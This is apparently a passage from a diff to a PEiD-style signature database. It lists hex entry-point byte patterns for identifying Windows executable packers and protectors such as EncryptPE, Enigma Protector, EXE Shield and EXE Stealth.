+signature = 60 9C 64 FF 35 00 00 00 00 E8 7A 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 53 79 73 74 65 6D 44 69 72 65 63 74 6F 72 79 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = true
+
+[EncryptPE 2.2004.8.10 - 2.2005.3.14 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 7A
+ep_only = true
+
+[EncryptPE 2.2006.7.10-2.2006.10.25 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = true
+
+[EncryptPE V2.2006.1.15 -> WFS]
+signature = 45 50 45 3A 20 45 6E 63 72 79 70 74 50 45 20 56 32 2E 32 30 30 36 2E 31 2E 31 35
+ep_only = false
+
+[EncryptPE V2.2006.7.10 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00
+ep_only = true
+
+[EncryptPE V2.2006.7.10 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 73 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00
+ep_only = true
+
+[EncryptPE V2.2007.04.11 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73
+ep_only = true
+
+[EncryptPE V2.2007.4.11 -> WFS]
+signature = 60 9C 64 FF 35 00 00 00 00 E8 1B 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 47 65 74 54 65 6D 70 50 61 74 68 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 41 00 00 00 43 72 65 61 74 65 46 69 6C 65 4D 61 70 70 69 6E 67 41 00 00 00 4D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 55 6E 6D 61 70 56 69 65 77 4F 66 46 69 6C 65 00 00 00 43 6C 6F 73 65 48 61 6E 64 6C 65 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 00 00 00
+ep_only = true
+
+[ENIGMA Protector -> Sukhov Vladimir]
+signature = 45 6E 69 67 6D 61 20 70 72 6F 74 65 63 74 6F 72 20 76 31
+ep_only = false
+
+[Enigma Protector 1.0X -> Sukhov Vladimir]
+signature = 60 E8 00 00 00 00 5D 83 ?? ?? 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 ?? 83 C4 04 EB 02 ?? ?? 60 E8 24 00 00 00 00 00 ?? EB 02 ?? ?? 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 ?? ?? 89 C4 61 EB 2E ?? ?? ?? ?? ?? ?? ?? EB 01 ?? 31 C0 EB 01 ?? 64 FF 30 EB 01 ?? 64 89 20 EB 02 ?? ?? 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 ?? 58 61 EB 01
+ep_only = false
+
+[Enigma protector 1.10 (unregistered)]
+signature = 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89
+ep_only = false
+
+[Enigma protector 1.10 (unregistered)]
+signature = 60 72 80 72 88 72 8C 72 90 72 94 72 98 72 9C 72 A0 72 A4 59 A8 B0 5C E8 39 D5 39 E4 39 F1 31 F9 5C 3D 58 CA 5F 56 B1 2D 20 7A 2E 30 16 32 72 2B 72 36 1C A5 33 A9 9C AD 9C B1 9C B5 9C B9 9C BD 9C C1 9C C5 9C C9 9C CD 9C D1 9C D5 9C D9 9C DD 9C E1 9C E5 89 E9 51 0B C4 80 BC 7E 35 09 37 E7 C9 3D C9 45 C9 4D 74 92 BA E4 E9 24 6B DF 3E 0E 38 0C 49 10 27 80 51 A1 8E 3A A3 C8 AE 3B 1C 35
+ep_only = false
+
+[Enigma protector 1.10/1.11 -> Vladimir Sukhov]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31
+ep_only = false
+
+[Enigma protector 1.10/1.11 -> Vladimir Sukhov]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 3D 1A
+ep_only = false
+
+[Enigma protector 1.12 -> Vladimir Sukhov]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31 C0 C3 83 C0 08 EB 02 FF 15 89 C4 61 EB 2E EA EB 2B 83 04 24 03 EB 01 00 31 C0 EB 01 85 64 FF 30 EB 01 83 64 89 20 EB 02 CD 20 89 00 9A 64 8F 05 00 00 00 00 EB 02 C1 90 58 61 EB 01 3E EB 04 ?? ?? ?? ?? B8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 01 E8 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 05 F6 01 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 B9 44 1A
+ep_only = false
+
+[Enigma Protector 1.1X-1.3X -> Sukhov Vladimir & Serge N. Markin]
+signature = 55 8B EC 83 C4 F0 B8 00 10 40 00 E8 01 00 00 00 9A 83 C4 10 8B E5 5D E9
+ep_only = false
+
+[Enigma Protector 1.31 Build 20070615 Dll -> Sukhov Vladimir & Serge N. Markin]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 81 ED ?? ?? ?? ?? E9 49 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8A 84 24 28 00 00 00 80 F8 01 0F 84 07 00 00 00 B8 ?? ?? ?? ?? FF E0 E9 04 00 00 00 ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 81 C0 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 30 10 40 49 0F 85 F6 FF FF FF E9 04 00 00 00
+ep_only = true
+
+[Enigma Protector 1.X -> Sukhov Vladimir & Serge N. Markin]
+signature = 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 45 78 69 74 50 72 6F 63 65 73 73 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 4D 65 73 73 61 67 65 42 6F 78 41 00 00 00 52 65 67 43 6C 6F 73 65 4B 65 79 00 00 00 53 79 73 46 72 65 65 53 74 72 69 6E 67 00 00 00 43 72 65 61 74 65 46 6F 6E 74 41 00 00 00 53 68 65 6C 6C 45 78 65 63 75 74 65 41 00 00
+ep_only = false
+
+[ENIGMA Protector V1.1-> Sukhov Vladimir]
+signature = 60 E8 00 00 00 00 5D 83 ?? ?? 81
+ep_only = true
+
+[ENIGMA Protector V1.1-V1.2-> Sukhov Vladimir]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 81
+ep_only = true
+
+[Enigma Protector v1.12 LITE]
+signature = 60 E8 00 00 00 00 5D 83 ED 06 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31
+ep_only = true
+
+[ENIGMA Protector V1.12-> Sukhov Vladimir]
+signature = 60 E8 00 00 00 00 5D 83 C5 FA 81 ED ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? E8 01 00 00 00 9A 83 C4 04 EB 02 FF 35 60 E8 24 00 00 00 00 00 FF EB 02 CD 20 8B 44 24 0C 83 80 B8 00 00 00 03 31
+ep_only = true
+
+[EP v1.0]
+signature = 50 83 C0 17 8B F0 97 33 C0 33 C9 B1 24 AC 86 C4 AC AA 86 C4 AA E2 F6 00 B8 40 00 03 00 3C 40 D2 33 8B 66 14 50 70 8B 8D 34 02 44 8B 18 10 48 70 03 BA 0C ?? ?? ?? ?? C0 33 FE 8B 30 AC 30 D0 C1 F0 10 C2 D0 30 F0 30 C2 C1 AA 10 42 42 CA C1 E2 04 5F E9 5E B1
+ep_only = true
+
+[EPW v1.2]
+signature = 06 57 1E 56 55 52 51 53 50 2E ?? ?? ?? ?? 8C C0 05 ?? ?? 2E ?? ?? ?? 8E D8 A1 ?? ?? 2E
+ep_only = true
+
+[EPW v1.30]
+signature = 06 57 1E 56 55 52 51 53 50 2E 8C 06 08 00 8C C0 83 C0 10 2E
+ep_only = true
+
+[Escargot 0.1 (final) -> ++Meat]
+signature = EB 04 40 30 2E 31 60 68 61 ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 92 ?? ?? ?? 8B 00 FF D0 50 B8 CD ?? ?? ?? 81 38 DE C0 37 13 75 2D 68 C9 ?? ?? ?? 6A 40 68 00 ?? 00 00 68 00 00 ?? ?? B8 96 ?? ?? ?? 8B 00 FF D0 8B 44 24 F0 8B 4C 24 F4 EB 05 49 C6 04 01 40 0B C9 75 F7 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50
+ep_only = true
+
+[Escargot 0.1 - by ueMeat]
+signature = EB 08 28 65 73 63 30 2E 31 29 60 68 2B ?? ?? ?? 64 FF 35 00 00 00 00 64 89 25 00 00 00 00 B8 5C ?? ?? ?? 8B 00 FF D0 50 BE 00 10 ?? ?? B9 00 ?? ?? 00 EB 05 49 80 34 31 40 0B C9 75 F7 58 0B C0 74 08 33 C0 C7 00 DE C0 AD 0B BE ?? ?? ?? ?? E9 AC 00 00 00 8B 46 0C BB 00 00 ?? ?? 03 C3 50 50 B8 54 ?? ?? ?? 8B 00 FF D0 5F 80 3F 00 74 06 C6 07 00 47 EB F5 33 FF 8B 16 0B D2 75 03 8B 56 10 03 D3 03 D7 8B 0A C7 02 00 00 00 00 0B C9 74 4B F7 C1 00 00 00 80 74 14 81 E1 FF FF 00 00 50 51 50 B8 50
+ep_only = false
+
+[Escargot V0.1 -> ++Meat]
+signature = EB 04 40 30 2E 31 60 68 61
+ep_only = true
+
+[Excalibur 1.03 -> forgot]
+signature = E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00
+ep_only = true
+
+[Excalibur V1.03 -> forgot]
+signature = E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39
+ep_only = true
+
+[eXcalibur v1.03 -> forgot/us]
+signature = E9 00 00 00 00 60 E8 14 00 00 00 5D 81 ED 00 00 00 00 6A 45 E8 A3 00 00 00 68 00 00 00 00 E8 58 61 EB 39 20 45 78 63 61 6C 69 62 75 72 20 28 63 29 20 62 79 20 66 6F 72 67 6F 74 2F 75 53 2F 44 46 43 47 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
+ep_only = true
+
+[Exe Guarder v1.8 -> Exeicon.com]
+signature = 55 8B EC 83 C4 D0 53 56 57 8D 75 FC 8B 44 24 30 25 00 00 FF FF 81 38 4D 5A 90 00 74 07 2D 00 10 00 00 EB F1 89 45 FC E8 C8 FF FF FF 2D B2 04 00 00 89 45 F4 8B 06 8B 40 3C 03 06 8B 40 78 03 06 8B C8 8B 51 20 03 16 8B 59 24 03 1E 89 5D F0 8B 59 1C 03 1E 89
+ep_only = true
+
+[EXE joiner -> Amok]
+signature = A1 14 A1 40 00 C1 E0 02 A3 18 A1 40
+ep_only = true
+
+[Exe Locker 1.0 -> IonIce]
+signature = E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00
+ep_only = true
+
+[Exe Locker v1.0 --> IonIce]
+signature = E8 00 00 00 00 60 8B 6C 24 20 81 ED 05 00 00 00 3E 8F 85 6C 00 00 00 3E 8F 85 68 00 00 00 3E 8F 85 64 00 00 00 3E 8F 85 60 00 00 00 3E 8F 85 5C 00 00 00 3E 8F 85 58 00 00 00 3E 8F 85 54 00 00
+ep_only = true
+
+[EXE Manager Version 3.0 1994 (c) Solar Designer]
+signature = B4 30 1E 06 CD 21 2E ?? ?? ?? BF ?? ?? B9 ?? ?? 33 C0 2E ?? ?? 47 E2
+ep_only = true
+
+[EXE Packer v7.0 by TurboPower Software]
+signature = 1E 06 8C C3 83 ?? ?? 2E ?? ?? ?? ?? B9 ?? ?? 8C C8 8E D8 8B F1 4E 8B FE
+ep_only = true
+
+[EXE Shield v0.1b - v0.3b, v0.3 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05
+ep_only = true
+
+[EXE Shield V0.5 -> Smoke]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40
+ep_only = true
+
+[EXE Shield V0.5 -> Smoke]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED BC 1A 40 00 EB 01 00 8D B5 46 1B 40 00 BA B3 0A 00 00 EB 01 00 8D 8D F9 25 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[EXE Shield V0.6 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40
+ep_only = true
+
+[EXE Shield V0.6 -> SMoKE]
+signature = E8 04 00 00 00 83 60 EB 0C 5D EB 05 45 55 EB 04 B8 EB F9 00 C3 E8 00 00 00 00 5D 81 ED D4 1A 40 00 EB 01 00 8D B5 5E 1B 40 00 BA A1 0B 00 00 EB 01 00 8D 8D FF 26 40 00 8B 09 E8 14 00 00 00 83 EB 01 00 8B FE E8 00 00 00 00 58 83 C0 07 50 C3 00 EB 04 58 40 50 C3 8A 06 46 EB 01 00 D0 C8 E8 14 00 00 00 83 EB 01 00 2A C2 E8 00 00 00 00 5B 83 C3 07 53 C3 00 EB 04 5B 43 53 C3 EB 01 00 32 C2 E8 0B 00 00 00 00 32 C1 EB 01 00 C0 C0 02 EB 09 2A C2 5B EB 01 00 43 53 C3 88 07 EB 01 00 47 4A 75 B4 90
+ep_only = true
+
+[Exe Shield v1.7]
+signature = EB 06 68 90 1F 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90
+ep_only = true
+
+[Exe Shield v2.7]
+signature = EB 06 68 F4 86 06 00 C3 9C 60 E8 02 00 00
+ep_only = true
+
+[Exe Shield v2.7b]
+signature = EB 06 68 40 85 06 00 C3 9C 60 E8 02 00 00 00 33 C0 8B C4 83 C0 04 93 8B E3 8B 5B FC 81 EB 3F 90 40 00 87 DD 8B 85 E6 90 40 00 01 85 33 90 40 00 66 C7 85 30 90 40 00 90 90 01 85 DA 90 40 00 01 85 DE 90 40 00 01 85 E2 90 40 00 BB 7B 11 00 00 03 9D EA 90 40
+ep_only = true
+
+[Exe Shield v2.9]
+signature = 60 E8 00 00 00 00 5D 81 ED 0B 20 40 00 B9 EB 08 00 00 8D BD 53 20 40 00 8B F7 AC ?? ?? ?? F8
+ep_only = true
+
+[Exe Shield vx.x]
+signature = 65 78 65 73 68 6C 2E 64 6C 6C C0 5D 00
+ep_only = true
+
+[Exe Stealth 2.75a -> WebtoolMaster]
+signature = EB 58 53 68 61 72 65 77 61 72 65 2D 56 65 72 73 69 6F 6E 20 45 78 65 53 74 65 61 6C 74 68 2C 20 63 6F 6E 74 61 63 74 20 73 75 70 70 6F 72 74 40 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72
+ep_only = true
+
+[EXE Stealth v1.1]
+signature = 60 E8 00 00 00 00 5D 81 ED FB 1D 40 00 B9 7B 09 00 00 8B F7 AC
+ep_only = true
+
+[EXE Stealth v2.5]
+signature = 60 90 EB 22 45 78 65 53 74 65 61 6C 74 68 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D E8 00 00 00 00 5D 81 ED 40 1E 40 00 B9 99 09 00 00 8D BD 88 1E 40 00 8B F7 AC
+ep_only = false
+
+[EXE Stealth v2.7]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED D3 26 40
+ep_only = true
+
+[EXE Stealth v2.71]
+signature = EB 00 60 EB 00 E8 00 00 00 00 5D 81 ED B0 27 40
+ep_only = true
+
+[EXE Stealth v2.72]
+signature = EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20
+ep_only = true
+
+[EXE Stealth v2.73]
+signature = EB 00 EB 2F 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 EB 16 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 00 60 90 E8 00 00 00 00 5D 81 ED F0 27 40 00 B9 15 00 00 00 83 C1 05 EB 05 EB FE 83 C7 56 EB 00 83 E9 02
+ep_only = false
+
+[EXE Stealth v2.74]
+signature = EB 00 EB 17 53 68 61 72 65 77 61 72 65 20 2D 20 45 78 65 53 74 65 61 6C 74 68 00 60 90 E8 00 00 00 00 5D 81 ED C4 27 40 00 B9 15 00 00 00 83 C1 04 83 C1 01 EB 05 EB FE 83 C7 56 EB 00 83 E9 02 81 C1 78 43 27 65 EB 00 81 C1 10 25 94 00 81 E9 63 85 00 00 B9
+ep_only = false
+
+[EXE Stealth v2.74 -> WebToolMaster]
+signature = EB 00 EB 17 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 60 90 E8 00 00 00 00 5D
+ep_only = true
+
+[EXE Stealth v2.76 -> WebToolMaster]
+signature = EB 65 45 78 65 53 74 65 61 6C 74 68 20 56 32 20 2D 20 77 77 77 2E 77 65 62 74 6F 6F 6C 6D 61 73 74 65 72 2E 63 6F 6D 20 59 4F 55 52 20 41 44 20 48 45 52 45 21 50 69 52 41 43 59 20 69 53 20 41
+ep_only = true
+
+[EXE32Pack v1.36]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED CC 8D 40
+ep_only = true
+
+[EXE32Pack v1.37]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED 4C 8E 40
+ep_only = true
+
+[EXE32Pack v1.38]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED DC 8D 40
+ep_only = true
+
+[EXE32Pack v1.39]
+signature = 3B C0 74 02 81 83 55 3B C0 74 02 81 83 53 3B C9 74 01 BC ?? ?? ?? ?? 02 81 ?? ?? ?? ?? ?? ?? ?? 3B DB 74 01 BE 5D 8B D5 81 ED EC 8D 40
+ep_only = true
+
+[EXE32Pack v1.3x]
+signature = 3B ?? 74 02 81 83 55 3B ?? 74 02 81 ?? 53 3B ?? 74 01 ?? ?? ?? ?? ?? 02 81 ?? ?? E8 ?? ?? ?? ?? 3B 74 01 ?? 5D 8B D5 81 ED
+ep_only = true
+
+[ExeBundle v3.0 (small loader)]
+signature = 00 00 00 00 60 BE 00 F0 40 00 8D BE 00 20 FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11
+ep_only = true
+
+[ExeBundle v3.0 (standard loader)]
+signature = 00 00 00 00 60 BE 00 B0 42 00 8D BE 00 60 FD FF C7 87 B0 E4 02 00 31 3C 4B DF 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB
+ep_only = true
+
+[EXECrypt 1.0 -> ReBirth]
